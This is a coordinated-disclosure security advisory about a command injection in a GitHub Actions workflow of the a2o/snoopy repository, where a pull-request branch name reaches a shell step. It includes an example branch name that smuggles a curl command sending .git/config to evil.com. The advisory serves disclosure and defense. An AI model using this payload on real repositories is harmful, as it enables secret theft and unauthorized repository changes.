GHSL-2021-015: Command injection in a2o/snoopy workflow

Coordinated Disclosure Timeline

• 2021-01-18: Report sent to maintainers.
• 2021-01-18: Maintainers acknowledged.
• 2021-01-18: Issue resolved.

Summary

The code-qa-sonarcloud.yml GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration from a Pull Request.

Product

a2o/snoopy repository

Tested Version

The latest changeset of code-qa-sonarcloud.yml to the date.

Details

Issue: A branch name from the pull request is used to format a shell command

on:
...
  pull_request_target:
...
      - name: Scan and submit to SonarCloud - on PR
        run: |
            CURRENT_BRANCH_NAME=`git branch --show-current`
            SONARCLOUD_TAG=`./dev-tools/libexec/get-sonarcloud-tag.sh`
            /opt/sonar-scanner \
              -Dsonar.organization=a2o \
              -Dsonar.projectKey=snoopy \
              -Dsonar.sources=. \
              -Dsonar.pullrequest.provider=github \
              -Dsonar.pullrequest.key=${{ github.event.pull_request.number }} \
              -Dsonar.pullrequest.branch=${{github.event.pull_request.head.repo.owner.login}}:${{github.event.pull_request.head.ref}} \
...
        env:
          SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}

Impact

If the repository owner doesn’t notice a pull request branch name and assigns a ‘/ci run additional tests’ label this vulnerability allows for arbitrary command injection into the bash script which allows for unauthorized modification of the base repository and secrets exfiltration. For example a PR from branch named a;${IFS}curl${IFS}-d${IFS}@.git/config${IFS}evil.com${IFS}# would exfiltrate the repository token to the attacker controlled server.

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-015 in any communication regarding this issue.